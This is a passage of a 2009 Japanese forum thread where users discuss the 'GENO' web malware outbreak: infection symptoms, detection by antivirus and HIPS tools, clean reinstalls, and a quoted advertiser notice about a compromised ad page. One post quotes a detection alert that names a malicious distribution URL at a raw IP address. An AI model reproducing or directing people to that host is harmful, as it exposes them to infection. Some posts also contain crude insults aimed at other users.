>>907 USBのブートレコードへの感染にはくれぐれも注意したほうがいいよ。
>>910 そうなのよねー
バックアップしても、新しいOSに突っ込みたくないわw
>>909 WikiのURLまで出して間違えに気づいてないのかお前は
こういうヤツがウイルスに感染して ウイルスに感染したからこんなとこに貼り付いてるんだよな
http://takeshima.2ch.net/test/read.cgi/news4vip/1239059037/ 441 以下、名無しにかわりましてVIPがお送りします 2009/04/07(火) 19:52:26.14 ID:jaXpHGCM0
URLの特徴は短縮が主
だけどyahooのトップの気付いたら飛ばされてるパターンも
あるから、一概に言えない
その場合
リンク踏み→ウイルスURL(非表示)→yahooトップ
とウイルスを持ってるサイトが表示されない可能性が高い
こういうのはバックドア系の典型で、ウイルス作成者が商用
にしてる可能性が高いことを裏付けるな
443 以下、名無しにかわりましてVIPがお送りします 2009/04/07(火) 19:57:41.08 ID:jaXpHGCM0
特にスパイウェア系のファイルがwindowsフォルダ内に
ランダムに生成されてしまうのがやっかい
その場合conime.exeの他にPDFだったり、windowsファイルに実際に存在する
ファイルと同一名称で生成されてしまうので検索も面倒
ただ生成されるファイルの多くが容量17kbだったりと共通点もある
>>916 何度もいうがバックアップの類は大丈夫だといってるだろ
919 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 18:13:47
カスペでも検出できない様に改変されてるっぽいのだけど
>>913 ごめん。わからん。
IRCプロトコル使ってるんじゃないの?
>>918 そもそもだれも最後まで解析していないし、
明確な外部のソース等を提示していないのに
大丈夫もへったくれもないだろ。そもそも。
>>918 その理由は??
新たなウイルスジャンジャン実行してるかもしれないのに。
923 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 18:32:12
検知しました: トロイの木馬 Exploit.JS.Pdfka.gz URL: http://94.247.2.195/news/?id=2//data0000 というのが加わった
924 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 18:33:38
川崎病並みにウイルス名が店名ってすばらしい ジェノはノーベル賞やギネスビールに並んだ
とりあえず乗っ取られてるサーバ全部止めて欲しいわ…
>>921 USBメモリに感染を試みるような大胆なウイルスならこんなに手間取ってないからw
憶測で物を言う前に少しは自分で調べてみたら?
>>922 そもそもこいつがウイルスに感染したという前提になってるところからしておかしい。
確証もないのに勝手にウイルスと結びつけてリカバリー指示ですか。
新たなウイルスをスパイウェアを呼び込む 部分的にレジストリ改変・破壊。各所に複製 PCの不具合が徐々に増えていって、最後にブルースクリーンあぽーん
GENOウイルスとか業務妨害になるような スレタイよく平気でつかられるな どうせ人生捨てているニートなんだろうがwww
> 業務妨害
>>920 botネットは操り人形になったコンピューターのネットワークのことであって
IRCはマスターの通信手段に過ぎない
TROJ_GENOME.BKがどうかした?
>>926 工作するならもっと上手くやった方がいいと思う。
>>933 悔しかった?w
GENOでも訴えれば楽になるんじゃない?w
936 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 18:52:46
>>934 は自分の脳内のウイルスも駆除できてない模様
ID無しでやってきてるセキュ板住民の目は誤魔化せないよ!
赤い傘最強伝説
それを言うなら赤帽だろw
>>941 一応、これでも音響カプラ全盛期からネットを利用している位に
無駄に暦だけは長い元あめざーな古参だから、
その気になればいくらでもジサクジエン位は出来るけどさw
てか、ぶっちゃけ、ダイアルアップ時代は
複数のプロバイダを駆使して回線つなぎ舞えて完璧な迷彩を施してジサクジエンしてスレを伸ばしたりしたけど、
今更IDでない過疎板でベタな釣りして遊ぶ程、落ちぶれてはいないよw
まぁ、あれだ。この前、某過疎板に誤爆しちゃったけどなw
このスレ見てるニュー速民いたら
>>947 を今すぐ持って帰れ
>948 返品不可
不妊ババって奴?
>元美人秘書室長◆W07s5cWHb. >(千葉県)の妄想虚言癖嫌われ池沼(beコテ)。千葉ババア、うんうんババアなどと呼ばれる。 >自信過剰、自意識過剰、妄想、嘘、知ったかぶり、全レス状態など >異常に古参ぶるもそれ程ではない。他板でも嫌われている。 キチガイばっかセキュ板に来る。 どういうことだこれ。
それは、おいらに粘着してる基地外が書いたのだよ。 昔木っ端微塵に論破した奴か罵倒して遊んでいた相手か 荒らし系コテをヲチして遊んでいたら逆恨みされてるとか、そんな感じで。 無駄に歴が長いんで、無駄に敵が多いんだよ。そこんとこ判れ。 てか、そもそもあのν速コテ図鑑は ν速で毎回VBS.Loveletterをコピペして貼り付ける事で有名だった 某基地外コテが開設しているサイトだ。 押して知るべし。
◆W07s5cWHb. ←こいつの相手は薮パソユーザーと八頭に任せた。
ちょっと待て その書き込みは GENOかも
とりあえず有用な情報を書いて欲しい。まぁでも明日の朝で一週間なんだな
959 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 19:40:39
ttp://ecnavi.jp/help/information/info/221/ 09/04/10[障害・サポート情報] 【重要】掲載のリンク先ページのウイルス感染について
お知らせ
【重要】ECナビの掲載広告にて発生したリンク先ページのウイルス感染について
この度、ECナビサイトにて掲載を行っておりました広告にてリンク先ページが
改ざんされた可能性があり、広告をクリックして遷移先ページを閲覧した
ご利用者様がウイルスに感染した可能性があるという事態が発生しました。
なお、対象となる広告は下記となります。
■対象広告
puppine(株式会社ブランジスタ)
■掲載期間、箇所
【4/2〜4/9 ポイントチャンス!】
://ecnavi.jp/frame/?url=http%3A%2F%2Fkensho.ecnavi.jp%2Fsearch%2F&KID=&search=&order=new
愛犬と一緒に楽しめる最新ライフスタイル情報が満載「puppine」
【4/9〜4/10 宝くじ ガラガラでポン!】
://point.ecnavi.jp/campaign/lottery/game/
ペットとわたしの新感覚ウェブマガジン「puppine」
※ECナビでは上記の危険認識により、4月10日 15時に広告掲載を停止いたしました。
今回のウィルスに関しましては、Flash/Adobe Readerの既知の脆弱性を悪用するもので、
最新版をお使いならば感染の危険がないという情報もございます。
しかしながら、被害状況等の詳細に関しましては現在掲載サイトにて確認を行っております。
状況が分かり次第再度ご報告させていただきますので、
今しばらくお待ちくださいますようお願いいたします。
そのコテの人の知識は役に立つ ただ自分語りは控えていただきたい
>>959 今頃発表か。
クリーンインストしれとはいわないのか。
コテは、叩かれやすくて大変だ。
逆アセンブル(?)ってやつやってやってもいいけど
>>966 セキュ板はずっと見てきてるからな。
俺もかなりの古参だし(草の根BBSの住人だった)
いま逆アセンブリやってる。
逆逆アセンブリまであとどんくらい?
970 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 19:59:41
今回の騒ぎでクリーンインスト3台やった俺が来ましたよっと。 クリーンインストのおかげで3台共動きが軽快。 ただし四日間かかったけど。 何がブラウザキャッシュをクリアだ。ふざけんな。
>>968 大体わかってきた。
どうやらあらゆるプロセスを乗っ取るらしい
>>969 俺は今改造されたsqlsodbc.chmを逆アセンブルでしらべてるんだけど
やり方は、
スタートからアクセサリでメモ帳を開きそこに、sqlsodbc.chmをドロップアンドドラッグする。
そうすると文字列が出てくるだろ?
>>971 >プロセスを乗っ取るらしい
そういうのってSSMとかCOMODOのディフェンス+とかで防げないの?
今回のケースではどうだったんだろ?
974 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 20:05:13
大西だったらν速から来た基地外の方がまし
>>973 防げるんじゃないか?
ただHIPS入れてるやつなら当然jsオフにしてるだろうから、
引っかかったやつはそういないと思うが。
コモドとかHIPS入ってるならそれより前の段階で防げるよ
978 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 20:08:59
ν速の方のすれってまだあるの?
リバエンするって言うもんだから(ry
俺は再インスコするのが面倒だからアンチウィルスソフトで検出されたマルウェア等を片っ端から削除した。 sqlsodbc.chmも改竄されてたので一旦削除してから、クリーンな別PCからソレを移植した。 まぁ一応平穏な状態には戻った。
いえーい! 再インスコした俺が通るよwwww それで、フルスキャンで検知→駆除はできるようになったの??
次スレは?
988 :
名無しさん@お腹いっぱい。 :2009/04/10(金) 20:29:56
>前の段階って何? 感染直前の段階、ぜい弱性をついて感染を試みるこの段階で警告がでるはず >それで、フルスキャンで検知→駆除はできるようになったの?? AntiVirだけ感染後ドロップされる一つファイルを検知できる 検知、駆除以前にドロップするファイル数がこのウイルスは極端に少ない、 ウイルスの動きが把握し切れてないので完全に駆除できたとは言い切れない よくて症状が治った程度
>>988 サンクス、もうしばらく注意必要って事ね。
>>988 さんくす
感染を試みる段階で警告か
いままで一回も見たことないw
AntivirとCOMODOで固めてて良かったみたいだ
てかGENOってこの事件ではじめて知ったけど
あ、選んだロダがアレだったな。 専用ブラでもプレビュー出来ないし、ちと開くのが怖いな。、これだと。
>>989 SSアップロードしてもらうまでもなかったんだが
手間取らせたね
サンキュウ
995 :
991 :2009/04/10(金) 20:38:32
あ、意味分かった 頓珍漢なこと聞いて済まなかった
次すれ立ててもこれ以上結論出そうにない
本スレ統合っえことでおk?
次スレ誰か立ててくれ
1001 :
1001 :
Over 1000 Thread このスレッドは1000を超えました。 もう書けないので、新しいスレッドを立ててくださいです。。。